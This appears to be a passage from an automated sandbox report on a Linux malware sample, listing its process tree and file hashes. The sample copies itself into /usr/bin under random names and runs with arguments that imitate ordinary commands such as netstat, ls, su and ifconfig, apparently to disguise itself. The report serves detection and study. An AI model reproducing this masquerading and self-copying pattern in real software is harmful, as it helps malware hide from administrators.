MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6608, Parent PID: 1860

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	/usr/bin/bsvlwqppmd "netstat -antop" 6205
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6610, Parent PID: 6608

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	-
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: 1.elf PID: 6613, Parent PID: 6205

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6614, Parent PID: 6613

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uhjknuzvai PID: 6614, Parent PID: 6613

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	/usr/bin/uhjknuzvai "route -n" 6205
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: uhjknuzvai PID: 6618, Parent PID: 6614

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	-
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: 1.elf PID: 6615, Parent PID: 6205

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6616, Parent PID: 6615

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uhjknuzvai PID: 6616, Parent PID: 1860

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	/usr/bin/uhjknuzvai "ls -la" 6205
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: uhjknuzvai PID: 6622, Parent PID: 6616

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	-
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: 1.elf PID: 6617, Parent PID: 6205

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6619, Parent PID: 6617

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uhjknuzvai PID: 6619, Parent PID: 1860

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	/usr/bin/uhjknuzvai "sleep 1" 6205
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: uhjknuzvai PID: 6623, Parent PID: 6619

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	-
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: 1.elf PID: 6620, Parent PID: 6205

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6621, Parent PID: 6620

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uhjknuzvai PID: 6621, Parent PID: 1860

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	/usr/bin/uhjknuzvai pwd 6205
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: uhjknuzvai PID: 6626, Parent PID: 6621

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	-
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: 1.elf PID: 6624, Parent PID: 6205

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6625, Parent PID: 6624

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: uhjknuzvai PID: 6625, Parent PID: 1860

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	/usr/bin/uhjknuzvai bash 6205
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: uhjknuzvai PID: 6627, Parent PID: 6625

General

Start time (UTC):	18:32:43
Start date (UTC):	26/10/2023
Path:	/usr/bin/uhjknuzvai
Arguments:	-
File size:	625889 bytes
MD5 hash:	91456298716554fecad3edd5ee4b700a

Chronological Activities

Analysis Process: 1.elf PID: 6630, Parent PID: 6205

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6631, Parent PID: 6630

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkpssqmflq PID: 6631, Parent PID: 6630

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	/usr/bin/lkpssqmflq top 6205
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: lkpssqmflq PID: 6635, Parent PID: 6631

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	-
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: 1.elf PID: 6632, Parent PID: 6205

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6633, Parent PID: 6632

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkpssqmflq PID: 6633, Parent PID: 1860

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	/usr/bin/lkpssqmflq top 6205
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: lkpssqmflq PID: 6639, Parent PID: 6633

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	-
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: 1.elf PID: 6634, Parent PID: 6205

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6636, Parent PID: 6634

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkpssqmflq PID: 6636, Parent PID: 1860

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	/usr/bin/lkpssqmflq su 6205
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: lkpssqmflq PID: 6640, Parent PID: 6636

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	-
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: 1.elf PID: 6637, Parent PID: 6205

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6638, Parent PID: 6637

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkpssqmflq PID: 6638, Parent PID: 1860

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	/usr/bin/lkpssqmflq gnome-terminal 6205
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: lkpssqmflq PID: 6643, Parent PID: 6638

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	-
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: 1.elf PID: 6641, Parent PID: 6205

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6642, Parent PID: 6641

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkpssqmflq PID: 6642, Parent PID: 1860

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	/usr/bin/lkpssqmflq "ifconfig eth0" 6205
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: lkpssqmflq PID: 6644, Parent PID: 6642

General

Start time (UTC):	18:32:48
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkpssqmflq
Arguments:	-
File size:	625889 bytes
MD5 hash:	e3edc5b700334c5fb57de877def5e6a9

Chronological Activities

Analysis Process: systemd PID: 6217, Parent PID: 6216

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6217, Parent PID: 6216

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities